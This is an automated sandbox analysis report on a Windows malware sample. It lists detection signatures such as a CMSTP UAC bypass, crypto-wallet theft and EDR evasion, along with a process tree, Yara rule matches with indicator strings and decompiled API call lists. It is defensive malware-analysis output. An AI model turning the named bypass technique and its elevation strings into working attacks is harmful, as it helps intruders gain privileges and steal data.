Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KClGcCpDAP.exe

Overview

General Information

Sample name:KClGcCpDAP.exe
renamed because original name is a hash value
Original sample name:61d2baf57c3ed6eda2d72720fc54ed04.exe
Analysis ID:1527626
MD5:61d2baf57c3ed6eda2d72720fc54ed04
SHA1:8c6ce6dc798b3d085102b96ffea2913efe5fb243
SHA256:08e1d8d41bef83310ed290e5b8b3821d7ead8f66709c90cd4caa27c567ab4e80
Tags:exeuser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KClGcCpDAP.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\KClGcCpDAP.exe" MD5: 61D2BAF57C3ED6EDA2D72720FC54ED04)
    • KClGcCpDAP.exe (PID: 7152 cmdline: "C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544 MD5: 4ED56BCA0F099784A4A341321C3D0695)
      • Virtual.exe (PID: 6188 cmdline: "C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe" MD5: C8A2DE7077F97D4BCE1A44317B49EF41)
        • Virtual.exe (PID: 396 cmdline: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe MD5: C8A2DE7077F97D4BCE1A44317B49EF41)
          • cmd.exe (PID: 6036 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • validPower_Lnz_x64.exe (PID: 344 cmdline: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • Virtual.exe (PID: 4428 cmdline: "C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe" MD5: C8A2DE7077F97D4BCE1A44317B49EF41)
    • cmd.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Virtual.exe (PID: 1312 cmdline: "C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe" MD5: C8A2DE7077F97D4BCE1A44317B49EF41)
    • cmd.exe (PID: 6172 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • validPower_Lnz_x64.exe (PID: 4960 cmdline: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.2272761676.000000000361D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000003.00000002.1778571972.0000000003DF6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000002.00000002.1722899571.0000000003F99000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        0000000C.00000002.2216100615.0000000003390000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000B.00000002.2162614521.0000000003A96000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x25f23a:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x25f2c5:$s1: CoGetObject
              • 0x25f21e:$s2: Elevation:Administrator!new:
              12.2.cmd.exe.33907f8.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                12.2.cmd.exe.33907f8.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x10f28:$s2: Elevation:Administrator!new:
                10.2.validPower_Lnz_x64.exe.264a6ed.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  Click to see the 11 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: KClGcCpDAP.exeVirustotal: Detection: 8%Perma Link
                  Source: KClGcCpDAP.exeReversingLabs: Detection: 23%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.2% probability
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0088A0BB DecryptFileW,0_2_0088A0BB
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008AFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_008AFA62
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00889E9E DecryptFileW,DecryptFileW,0_2_00889E9E
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D1A0BB DecryptFileW,1_2_00D1A0BB
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D3FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,1_2_00D3FA62
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D19E9E DecryptFileW,DecryptFileW,1_2_00D19E9E

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.cmd.exe.33907f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.validPower_Lnz_x64.exe.264a6ed.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.cmd.exe.3364a08.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.validPower_Lnz_x64.exe.2604a20.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.validPower_Lnz_x64.exe.26726ed.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.validPower_Lnz_x64.exe.262ca20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.validPower_Lnz_x64.exe.2649aed.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.2272761676.000000000361D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1778571972.0000000003DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1722899571.0000000003F99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2216100615.0000000003390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2162614521.0000000003A96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2217981386.000000000554C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.2475629890.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2022025745.0000000005366000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.2662759098.0000000002626000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2221794602.00000000025FE000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: KClGcCpDAP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeFile opened: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49973 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49979 version: TLS 1.2
                  Source: KClGcCpDAP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: KClGcCpDAP.exe, 00000000.00000000.1694739395.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000001.00000000.1698457093.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp, KClGcCpDAP.exe, 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: msvcp100.amd64.pdb source: Virtual.exe, 00000002.00000003.1711778991.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1724662734.00000000665EF000.00000002.00000001.01000000.0000000C.sdmp, Virtual.exe, 00000003.00000002.1780293522.000000006646F000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxDDU\VBoxDDU.pdb source: Virtual.exe, 00000002.00000002.1726253927.00007FFE0E175000.00000002.00000001.01000000.00000009.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1781691145.00007FFE01345000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: msvcr100.amd64.pdb source: Virtual.exe, 00000002.00000003.1712097641.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1724966337.00000000666D1000.00000002.00000001.01000000.0000000A.sdmp, Virtual.exe, 00000003.00000002.1780499574.0000000066551000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxSVC\VBoxSVC.pdb source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: ntdll.pdb source: Virtual.exe, 00000002.00000002.1723901134.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1723366926.0000000004262000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779142264.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779322698.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779530074.00000000046C3000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223382909.0000000003C67000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225791718.0000000005466000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223754045.0000000004065000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226734814.0000000005E69000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224913907.0000000004C63000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225569136.0000000005265000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221493011.00000000021BA000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224527435.000000000486F000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226037437.000000000566C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231554808.0000000006869000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223213519.0000000003A61000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231176665.000000000646A000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231723937.0000000006A68000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224103581.000000000446D000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224699045.0000000004A60000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2232229859.0000000007064000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226981468.000000000606C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231892691.0000000006C64000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2229784780.0000000006260000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2222209839.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223555876.0000000003E66000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225140894.0000000004E67000.00000004.00000001.00020000.00000000.sdmp, validPower_Ln
                  Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000004.00000002.2022484937.0000000005630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2021878982.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: Virtual.exe, 00000002.00000002.1723901134.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1723366926.0000000004262000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779142264.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779322698.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779530074.00000000046C3000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223382909.0000000003C67000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225791718.0000000005466000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223754045.0000000004065000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226734814.0000000005E69000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224913907.0000000004C63000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225569136.0000000005265000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221493011.00000000021BA000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224527435.000000000486F000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226037437.000000000566C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231554808.0000000006869000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223213519.0000000003A61000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231176665.000000000646A000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231723937.0000000006A68000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224103581.000000000446D000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224699045.0000000004A60000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2232229859.0000000007064000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226981468.000000000606C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231892691.0000000006C64000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2229784780.0000000006260000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2222209839.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223555876.0000000003E66000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225140894.0000000004E67000.00000004.00000001.00020000.00000000.sdmp, validPower
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxRT\VBoxRT.pdb source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: wntdll.pdb source: cmd.exe, 00000004.00000002.2022484937.0000000005630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2021878982.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00873CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00873CC4
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008B4440 FindFirstFileW,FindClose,0_2_008B4440
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00889B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00889B43
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D44440 FindFirstFileW,FindClose,1_2_00D44440
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D19B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00D19B43
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D03CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00D03CC4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666644A8 _errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,SetErrorMode,2_2_666644A8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666663E4 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666663E4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666683E8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666683E8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666623A0 FindClose,FindFirstFileExA,FindNextFileA,FindClose,2_2_666623A0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66665EE8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66665EE8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66663F10 _errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,2_2_66663F10
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66667F84 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66667F84
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66662C0C FindClose,FindFirstFileExW,FindNextFileW,FindClose,2_2_66662C0C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66666DDC __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66666DDC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66667B1C __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66667B1C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666885C __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_6666885C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666668D8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666668D8
